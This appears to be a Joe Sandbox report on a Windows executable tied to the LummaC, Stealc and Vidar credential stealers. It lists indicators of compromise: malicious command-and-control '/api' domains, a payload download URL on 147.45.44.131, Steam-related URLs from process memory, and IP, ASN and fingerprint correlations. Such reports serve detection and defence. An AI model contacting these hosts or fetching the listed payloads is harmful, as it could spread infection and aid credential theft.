https://aka.ms/binaryformatter	0%	Avira URL Cloud	safe
https://ballotnwu.site/	0%	Avira URL Cloud	safe
http://.jpg	0%	Avira URL Cloud	safe
https://ballotnwu.site/api	100%	Avira URL Cloud	malware
https://ptramidermsnqj.shop/api	100%	Avira URL Cloud	malware
https://aka.ms/dotnet-core-applaunch?openGetWindowsDirectory	0%	Avira URL Cloud	safe
https://stogeneratmns.shop/	100%	Avira URL Cloud	malware
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Avira URL Cloud	safe
ptramidermsnqj.shop	100%	Avira URL Cloud	malware
https://aka.ms/dotnet-illink/com	0%	Avira URL Cloud	safe
https://vozmeatillu.shop/api	100%	Avira URL Cloud	malware
https://ghostreedmnu.shop/api	100%	Avira URL Cloud	malware
https://stogeneratmns.shop/api	100%	Avira URL Cloud	malware
https://sketchfab.com	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
https://www.youtube.com/	0%	Avira URL Cloud	safe
http://127.0.0.1:27060	0%	Avira URL Cloud	safe
fragnantbui.shop	100%	Avira URL Cloud	malware
http://147.45.44.131	0%	Avira URL Cloud	safe
https://fragnantbui.shop/api	100%	Avira URL Cloud	malware
https://ballotnwu.site/apiA	0%	Avira URL Cloud	safe
https://offensivedzvju.shop/api	100%	Avira URL Cloud	malware
gutterydhowi.shop	100%	Avira URL Cloud	malware
drawzhotdog.shop	100%	Avira URL Cloud	malware
https://www.google.com/recaptcha/	0%	Avira URL Cloud	safe
https://ptramidermsnqj.shop/llh	100%	Avira URL Cloud	malware
offensivedzvju.shop	100%	Avira URL Cloud	malware
https://aka.ms/GlobalizationInvariantMode	0%	Avira URL Cloud	safe
vozmeatillu.shop	100%	Avira URL Cloud	malware
https://aka.ms/dotnet-illink/nativehost	0%	Avira URL Cloud	safe
https://steamcommunity.com/	0%	Avira URL Cloud	safe
https://aka.ms/dotnet/download	0%	Avira URL Cloud	safe
https://steamcommunity.com/y	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
fragnantbui.shop	188.114.97.3	true	true	unknown
gutterydhowi.shop	104.21.4.136	true	true	unknown
steamcommunity.com	104.102.49.254	true	false	unknown
ptramidermsnqj.shop	104.21.83.105	true	true	unknown
offensivedzvju.shop	188.114.96.3	true	true	unknown
stogeneratmns.shop	188.114.96.3	true	true	unknown
reinforcenh.shop	172.67.208.139	true	true	unknown
drawzhotdog.shop	172.67.162.108	true	true	unknown
ghostreedmnu.shop	188.114.96.3	true	true	unknown
vozmeatillu.shop	188.114.97.3	true	true	unknown
ballotnwu.site	104.21.2.13	true	true	unknown
171.39.242.20.in-addr.arpa	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://drawzhotdog.shop/api	true	Avira URL Cloud: malware	unknown
http://147.45.44.131/files/gqgqg.exe	false	Avira URL Cloud: safe	unknown
https://gutterydhowi.shop/api	true	Avira URL Cloud: malware	unknown
reinforcenh.shop	true	Avira URL Cloud: malware	unknown
stogeneratmns.shop	true	Avira URL Cloud: malware	unknown
https://reinforcenh.shop/api	true	Avira URL Cloud: malware	unknown
ghostreedmnu.shop	true	Avira URL Cloud: malware	unknown
https://ballotnwu.site/api	true	Avira URL Cloud: malware	unknown
https://ptramidermsnqj.shop/api	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
https://vozmeatillu.shop/api	true	Avira URL Cloud: malware	unknown
https://stogeneratmns.shop/api	true	Avira URL Cloud: malware	unknown
ptramidermsnqj.shop	true	Avira URL Cloud: malware	unknown
https://ghostreedmnu.shop/api	true	Avira URL Cloud: malware	unknown
fragnantbui.shop	true	Avira URL Cloud: malware	unknown
gutterydhowi.shop	true	Avira URL Cloud: malware	unknown
https://offensivedzvju.shop/api	true	Avira URL Cloud: malware	unknown
https://fragnantbui.shop/api	true	Avira URL Cloud: malware	unknown
offensivedzvju.shop	true	Avira URL Cloud: malware	unknown
drawzhotdog.shop	true	Avira URL Cloud: malware	unknown
vozmeatillu.shop	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	file.exe	false	Avira URL Cloud: safe	unknown
https://player.vimeo.com	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.microsoft	powershell.exe, 00000001.00000002.1741341041.0000000007079000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000001.00000002.1738535388.00000000056A7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/dotnet/app-launch-failed	file.exe	false	Avira URL Cloud: safe	unknown
https://www.gstatic.cn/recaptcha/	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://s.yu	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://.css	file.exe	false	Avira URL Cloud: safe	unknown
https://ballotnwu.site/apiQ	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://offensivedzvju.shop/	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://aka.ms/dotnet-illink/com)	file.exe	false	Avira URL Cloud: safe	unknown
https://github.com/dotnet/runtime	file.exe	false	Avira URL Cloud: safe	unknown
https://recaptcha.net/recaptcha/	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.youtube.com	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/dotnet/infopath-to-application:Usage:	file.exe	false	Avira URL Cloud: safe	unknown
https://ghostreedmnu.shop/apiB	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://medal.tv	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/dotnet-warnings/	file.exe	false	Avira URL Cloud: safe	unknown
https://broadcast.st.dl.eccdnx.com	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/dotnet/sdk-not-foundInstall	file.exe	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.1735747000.0000000004641000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/nativeaot-compatibility	file.exe	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000001.00000002.1738535388.00000000056A7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.1738535388.00000000056A7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/binaryformatter	file.exe	false	Avira URL Cloud: safe	unknown
https://login.steampowered.com/	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.1735747000.0000000004641000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/dotnet-core-applaunch?Path:	file.exe	false	Avira URL Cloud: safe	unknown
http://.jpg	file.exe	false	Avira URL Cloud: safe	unknown
https://ballotnwu.site/	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.1738535388.00000000056A7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/dotnet-core-applaunch?openGetWindowsDirectory	file.exe	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.1735747000.000000000479F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stogeneratmns.shop/	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.1735747000.000000000479F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 00000001.00000002.1735747000.0000000004F58000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000001.00000002.1738535388.00000000056A7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/dotnet-illink/com	file.exe	false	Avira URL Cloud: safe	unknown
https://recaptcha.net	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sketchfab.com	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lv.queniujq.cn	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	RegAsm.exe, 00000005.00000002.1851549832.0000000000ED5000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://www.youtube.com/	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://127.0.0.1:27060	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.1735747000.000000000479F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://147.45.44.131	powershell.exe, 00000001.00000002.1735747000.00000000048F5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ballotnwu.site/apiA	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/recaptcha/	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://help.steampowered.com/	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ptramidermsnqj.shop/llh	RegAsm.exe, 00000005.00000002.1851549832.0000000000EBA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.steampowered.com/	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/GlobalizationInvariantMode	file.exe	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/dotnet-illink/nativehost	file.exe	false	Avira URL Cloud: safe	unknown
https://aka.ms/dotnet/download	file.exe	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/;	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/y	RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.4.136	gutterydhowi.shop	United States	13335	CLOUDFLARENETUS	true
147.45.44.131	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
188.114.97.3	fragnantbui.shop	European Union	13335	CLOUDFLARENETUS	true
172.67.162.108	drawzhotdog.shop	United States	13335	CLOUDFLARENETUS	true
188.114.96.3	offensivedzvju.shop	European Union	13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	false
104.21.2.13	ballotnwu.site	United States	13335	CLOUDFLARENETUS	true
104.21.83.105	ptramidermsnqj.shop	United States	13335	CLOUDFLARENETUS	true
172.67.208.139	reinforcenh.shop	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519693
Start date and time:	2024-09-26 21:05:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@10/9@12/9
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
15:06:03	API Interceptor	20x Sleep call for process: powershell.exe modified
15:06:06	API Interceptor	3x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.4.136	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
147.45.44.131	AS5AB7c08n.exe	Get hash	malicious	MicroClip	Browse	147.45.44.131/files/tpgl053.exe
	ptgl503.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/files/gpto03.exe
	Suselx1.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/files/g5.exe
	gkqg90.ps1	Get hash	malicious	LummaC	Browse	147.45.44.131/files/otqp9.exe
	test.bat	Get hash	malicious	MicroClip	Browse	147.45.44.131/files/tpgl053.exe
	009.ps1	Get hash	malicious	LummaC	Browse	147.45.44.131/files/98.exe
	ir57.ps1	Get hash	malicious	LummaC	Browse	147.45.44.131/files/yqy9.exe
	ueu7.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/files/yqy9.exe
	opqg.ps1	Get hash	malicious	LummaC	Browse	147.45.44.131/files/ypqhgl.exe
	TST.ps1	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse	147.45.44.131/files/mservice64.exe
188.114.97.3	HpCQgSai4e.exe	Get hash	malicious	FormBook	Browse	www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Ky4pZ0WB/download
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/1g7m/
	http://www.tiktok758.com/	Get hash	malicious	Unknown	Browse	www.tiktok758.com/img/logo.4c830710.svg
	TRmSF36qQG.exe	Get hash	malicious	FormBook	Browse	www.zhxgtlw.top/bopi/?0T5=UL08qvZHLtV&EnAHS=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4JOdI1EXss+
	PO5118000306 pdf.exe	Get hash	malicious	FormBook	Browse	www.rtprajalojago.live/2wnz/
	(PO403810)_VOLEX_doc.exe	Get hash	malicious	Lokibot	Browse	dddotx.shop/Mine/PWS/fre.php
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/DiF66Hbf/download
	http://easyantrim.pages.dev/id.html	Get hash	malicious	HTMLPhisher	Browse	easyantrim.pages.dev/id.html
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/13rSMZZi/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gutterydhowi.shop	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.4.136
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.132.32
	bYQ9uTqLzz.exe	Get hash	malicious	LummaC	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.132.32
steamcommunity.com	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Z09QznvZSr.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254
	HHXyi02DYl.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
fragnantbui.shop	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	bYQ9uTqLzz.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://link.trustpilot.com/ls/click?upn=u001.j-2BMD1rpUvfXVasz-2BUEF8v0gLqESYoH9OAOsEpvf5KFmayNUiIMUjOj-2F6xodjiwswXbJ5_rTIZcwdFQl8UVV0MQoqEOCgBw9W2jwyOcNXSjRnCSMzbe6L3Ws0d2debfLDgpXs6CwbIbJZZu0mJQCWbk0Mk14nO-2BxU9-2Blvuk1zQgy1VNRLMg1mRxfI5Q1Of5KhvuoPcWQXwBfEAkkr-2Bvt3Og4Y94IbOhDED0tzgJSAB1f90rFx1hm7V7-2F8MmLwvZJdulRBMTVbBzixYtMU1elLHm4R6vA-3D-3D#Ymhhc2thci5zYW1iYXNpdmFuQHNhYW1hLmNvbQ==	Get hash	malicious	Unknown	Browse	104.26.4.39
	https://solvetherecaptcha404.webflow.io/404	Get hash	malicious	Unknown	Browse	104.18.160.117
	Daniel Leblanc shared _Incendie Hudson._ with you. #12.eml	Get hash	malicious	Unknown	Browse	104.16.117.116
	https://empshentel.com/share/sharefile/	Get hash	malicious	HTMLPhisher	Browse	172.67.177.128
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.208.139
	http://egynte.com/	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFl1bBkz1ufgENuAZF1ODXRkOEXcot-2BlieaBFtd0IhXM08Jp__OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOxzyaiykDuoFljiX91jkOGF7TGq8s59HY1LfNpqOHr1hEZu4XswpdGfGTbIsw4Mg7Ewx-2FAzTwbYOEI5c5W9xQE63UMPeYSBL2GJwQizVTVETCyjhoaIq4ot5vl7L-2BMO3KbJCX7vVUyT6NGOFhbY99Ap0lxFmjxSsCRRr7CrNGrevXE9jp8IJyovKPHHX6-2FxnVR-2BVdKd5S1Zkq94QkyDWCs9lCPSQ3LNxOSscF1edS7fTz6-2Bswo-2FZW2dAOCyCTKBxs-3D#Ymhhc2thci5zYW1iYXNpdmFuQHNhYW1hLmNvbQ==	Get hash	malicious	Unknown	Browse	188.114.96.3
	SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exe	Get hash	malicious	Unknown	Browse	172.67.130.49
	SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exe	Get hash	malicious	Unknown	Browse	104.21.7.112
	Xerox-029_Scanned.pdf	Get hash	malicious	Phisher	Browse	188.114.97.3
CLOUDFLARENETUS	https://link.trustpilot.com/ls/click?upn=u001.j-2BMD1rpUvfXVasz-2BUEF8v0gLqESYoH9OAOsEpvf5KFmayNUiIMUjOj-2F6xodjiwswXbJ5_rTIZcwdFQl8UVV0MQoqEOCgBw9W2jwyOcNXSjRnCSMzbe6L3Ws0d2debfLDgpXs6CwbIbJZZu0mJQCWbk0Mk14nO-2BxU9-2Blvuk1zQgy1VNRLMg1mRxfI5Q1Of5KhvuoPcWQXwBfEAkkr-2Bvt3Og4Y94IbOhDED0tzgJSAB1f90rFx1hm7V7-2F8MmLwvZJdulRBMTVbBzixYtMU1elLHm4R6vA-3D-3D#Ymhhc2thci5zYW1iYXNpdmFuQHNhYW1hLmNvbQ==	Get hash	malicious	Unknown	Browse	104.26.4.39
	https://solvetherecaptcha404.webflow.io/404	Get hash	malicious	Unknown	Browse	104.18.160.117
	Daniel Leblanc shared _Incendie Hudson._ with you. #12.eml	Get hash	malicious	Unknown	Browse	104.16.117.116
	https://empshentel.com/share/sharefile/	Get hash	malicious	HTMLPhisher	Browse	172.67.177.128
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.208.139
	http://egynte.com/	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFl1bBkz1ufgENuAZF1ODXRkOEXcot-2BlieaBFtd0IhXM08Jp__OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOxzyaiykDuoFljiX91jkOGF7TGq8s59HY1LfNpqOHr1hEZu4XswpdGfGTbIsw4Mg7Ewx-2FAzTwbYOEI5c5W9xQE63UMPeYSBL2GJwQizVTVETCyjhoaIq4ot5vl7L-2BMO3KbJCX7vVUyT6NGOFhbY99Ap0lxFmjxSsCRRr7CrNGrevXE9jp8IJyovKPHHX6-2FxnVR-2BVdKd5S1Zkq94QkyDWCs9lCPSQ3LNxOSscF1edS7fTz6-2Bswo-2FZW2dAOCyCTKBxs-3D#Ymhhc2thci5zYW1iYXNpdmFuQHNhYW1hLmNvbQ==	Get hash	malicious	Unknown	Browse	188.114.96.3
	SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exe	Get hash	malicious	Unknown	Browse	172.67.130.49
	SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exe	Get hash	malicious	Unknown	Browse	104.21.7.112
	Xerox-029_Scanned.pdf	Get hash	malicious	Phisher	Browse	188.114.97.3
FREE-NET-ASFREEnetEU	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer	Browse	147.45.44.104
	https://bnbvfd.crabdance.com/clients/login.php	Get hash	malicious	Unknown	Browse	147.45.45.70
	https://tmsm.krtra.com/c/R2QnECLcaUYf/mYo0	Get hash	malicious	Unknown	Browse	147.45.47.98
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	147.45.44.104
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	AS5AB7c08n.exe	Get hash	malicious	MicroClip	Browse	147.45.44.131
	http://mir-belting.com	Get hash	malicious	Unknown	Browse	147.45.47.98

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.4.136 188.114.97.3 172.67.162.108 188.114.96.3 104.102.49.254 104.21.2.13 104.21.83.105 172.67.208.139
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.4.136 188.114.97.3 172.67.162.108 188.114.96.3 104.102.49.254 104.21.2.13 104.21.83.105 172.67.208.139
	http://google.com	Get hash	malicious	LummaC	Browse	104.21.4.136 188.114.97.3 172.67.162.108 188.114.96.3 104.102.49.254 104.21.2.13 104.21.83.105 172.67.208.139
	https://finalstepgo.com/uploads/il2.txt	Get hash	malicious	LummaC	Browse	104.21.4.136 188.114.97.3 172.67.162.108 188.114.96.3 104.102.49.254 104.21.2.13 104.21.83.105 172.67.208.139
	https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRH	Get hash	malicious	Unknown	Browse	104.21.4.136 188.114.97.3 172.67.162.108 188.114.96.3 104.102.49.254 104.21.2.13 104.21.83.105 172.67.208.139
	0.dll	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse	104.21.4.136 188.114.97.3 172.67.162.108 188.114.96.3 104.102.49.254 104.21.2.13 104.21.83.105 172.67.208.139
	DropboxInstaller.exe	Get hash	malicious	Unknown	Browse	104.21.4.136 188.114.97.3 172.67.162.108 188.114.96.3 104.102.49.254 104.21.2.13 104.21.83.105 172.67.208.139
	DropboxInstaller.exe	Get hash	malicious	Unknown	Browse	104.21.4.136 188.114.97.3 172.67.162.108 188.114.96.3 104.102.49.254 104.21.2.13 104.21.83.105 172.67.208.139
